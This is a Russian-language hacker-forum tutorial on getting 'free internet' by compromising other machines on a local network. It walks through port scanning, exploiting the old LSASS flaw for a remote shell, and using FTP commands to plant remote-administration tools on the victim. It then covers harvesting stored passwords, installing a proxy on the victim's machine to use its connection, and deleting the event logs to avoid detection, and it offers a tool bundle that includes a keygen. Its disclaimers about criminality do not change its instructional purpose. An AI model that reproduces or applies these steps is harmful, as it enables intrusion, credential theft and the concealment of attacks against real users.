Начну с того , что мне уже порядком недоели темы на форуме , типо "Халявный инет" и тд и тп .
С этой статье я приведу примеры (Гуру идут лесом
) как можно найти этот самый халявный инетернет , но помните это плохо , и уголовнонаказуемо !!!
Начну с того , что инет можно добыть несколькими способами , первый это настоящий взлом , второй способ это впарить жертве трояна , заманить на заражённую ссылку с эксплойтом и тд , и третий прийти к жертве и в наглую поставить ему прокси и юзать его инет !
Бредисловие
В недавном прошлом , на многих компьютерах стояли , Windows 2000 , Windows XP Home , Windows XP Pro sp1 , так вот все они были уязвимы и взламать их можно было посредством эксплойта SmallSoft Lsa Service Exploit или lsa.exe , этот эксплойт старый и использует уязвимость в
lsass.exe,
кстати в некоторых сетях до сих пор есть такие машины, которые уязвимы , толи люди не знают про sp2 , sp3 , толи просто им просто лень ставить hotfixы и закрыть 445 порт , хз , мол работает комп, да и ладно
Ну... полетели
Скачиваем сканер портов
Angry IP Scanner идём в настройки , и прописываем порты 21,22,135,138,139,445,1025,4489,3389 и тд и тп
Выбираем метод сканирование "Alive hosts (repoding pings only), сохраняем ,затем выбираем IP Range и вбиваем ипы вышей сети , к
примеру , а так ипы должны быть вашей сети !!!
Код:
10.0.0.0-255.255.255.255
Начинаем сканировать , вот появились первые клиенты , обращаем внимание на тех у кого больше всего открыто портов , затем берём эксплойт SmallSoft Lsa Service Exploit или lsa.exe и вписываем ip жертвы, тип атаки Shell и жмём
Начать
если , уязвимость есть то вы получаете командную строку компьютера жертвы
cmd.exe,
то есть вот такое чёрное dos окошечко, если уязвимости нет, окошко повисит и пропадёт и вы идёте лесом
ну допустим мы получили shell , теперь вам будет нужно поднять у себя на компьютере FTP-сервер , я выбрал
Serv-U
Serv-U представляет собой мощный, гибкий и легкий в установке ftp-сервер для всех платформ Windows. Функции безопасности обеспечиваются паролями и установкой прав на запись, чтение и изменение для каталогов и файлов для каждого пользователя, а также контролем доступа по IP-адресам.
Настроить его сможет даже ребёнок , заливаем к себе на фтп сервер нужные нам для дальнейшей работы файлы , выберем радмин сервер,ccproxy.exe и terminal.exe о нём почитать можно
тут это замечательная статья от
-=lebed=-, но или любой другой софт который вы используете .
Теперь возвращаемся в наше окошечко с полученным шеллом , и подключаемся к нашему ФТП-серверу
Код:
С:\WINDOWS\ftp
ftp> o
(to) (ваш ип)
ftp: connect: 127.0.0.1(login): anonymous
pass:Enter
Вошли на свой фтп , и идём в директорую где лежат наши файлы
команды по работе с
фтп вы можете найти у себя в справке и поддержке , достаточно набрать
ftp .
Так теперь , закачаем на комп жертвы наши файлы :
PHP код:
get radmin.exe
get terminal.exe
готово , выходим
bye
идём в директорую куда мы залили наши файлы , лучше выбрать директорую по глубже
С:\WINDOWS\system32 просмотрим командой dir
так... вот они голубчики :
запустим их
Код:
С:\WINDOWS\system32\terminal.exe
С:\WINDOWS\system32\radmin.exe
Ну вот и всё ! теперь мы может всё видеть и делать своё темное дело дальше
Хочу сказать , что мы произвели честный то есть тру взлом , мы никому ничего не впаривали , то есть нашли уязвимость и честно её юзаем , вывод , челу нужно закрыть 445 порт , поставить или обновить антивирь(кстати он тут не причём , бывали случаи когда на компах стоял KAV6 и при этом можно было приспокойной получить shell) и установить хороший фаерволл !
Летим дальше , думаю вы поняли прочитав статью Лебедя для чего нам нужен terminal.exe , да да да , вот именно , плюс ко всему мы ещё получили
бесплатный дедик !
так заходим в наш дедик , давайте осмотримся , что тут есть .... угу ... нам нужны пассы от всего что тут есть , скачиваем программу
MPR
запускаем смотрим , ага , вот нам и пасс от аськи , веб форм , и пароли от так желаемого нами интернета .
Наступает долгожданный момент !!! Но ... мы понимаем , что если мы сейчас запустим тут инет , то вылетим из локалки или не запустим инет вообще
, так так так , и тут нам на помощь приходит замечательная программка
RASPPPOE_099 идём на офф сайт скачиваем , распаковываем в любую папку , далее идём в Панель Управления>Cетевыe подключение>Подключения по локальной сети>Свойства , там Протокол Интеренета TCP/IP жмём Свойства , и выбираем Протокол=Добавить, далее нажмите кнопку «Установить с Диска». Да чё я тут распинаюсь вот тут можно посмотреть и почитать , там даже с картинками
http://www.rdtc.ru/internet_ivd_PPPoE_XP.php3
Так всё готово , бывает что нужно перегрузиться , но в большенстве случаев этого можно и не делать !
И вот мы уже юзаем чужой инет
, стыдно ? конечно стыдно и тем более за это есть статья !!!
ПОМНИТЕ ОБ ЭТОМ ! не стоит этот всех этих усилий , тем более ,что анлим сейчас стоит копейки !!!
Ну что теперь осталось скачать любой прокси сервер , установить его на компе жертвы , вернуться к себе , затем в
FireFox>Инстументы>Настройки>Допо нительно>Network=Settings=Manual Proxy configuration , вписываем ип жертвы и порт нашего прокси сервера . И радуемся чужому инету
Потом если у жертвы анлим , то можно уже с его компа производить сканирование портов и дальнейшие взломы , а вот ещё чуть не забыл , чтобы не палится нужно чистить лог , зайдите сюда
C:\WINDOWS\system32\config , AppEvent.Evt , SecEvent.Evt и тд , и удалите их на фиг , если будут проблемы с удалением и чисткой , скачайте
Unlocker и он поможет решить все ваши проблемы .
Если кому в лом искать и качать данный софт , залил Вот всё в одном флаконе !!!
terminal.exe KAV_keygen=радмин, ipscan и старый сплойт , в архиве
lsa.rar, RASPPPOE_099.ZIP,CCProxy.rar, Keygen KAV_all.exe=радмин-сервер , хочу заметить , что пинчей и всякой прочей лабуду в этих файла нет , отмечу что на CCProxy.ехе после обработки его Reshackom стал рычать на него Nod 32 , с радмином я думаю всё тоже ясно , но по крайне мере это юзалось , то однин Каспер на него повизгивал и тогда когда конектишься к нему через TELNET , мол атака RootShell , Telminal.exe тоже не буду выкладывать , сначало почитайте статью
Лебедя -=lebed=-тут там и скачаете Terminal.exe , MPR тоже выкладывать не буду потому что на него рычат антивири , мол Троян PWS , чтобы потом не было предъяв , мол я кому то троя пытался впарить !!!
Послесловие :
Надеюсь после этой статейки , больше не будет тем " Халявный Инет и тд и тп "(стану модером буду банить за такие топы
)
и помните это уголовнонаказуемо и противозаконно ! не
использовать на практике !!!!
Всего всем доброго , удачи
http://stopxaker.com
Халявный Интернет (для взрослых и немощных )
Комбинированный вид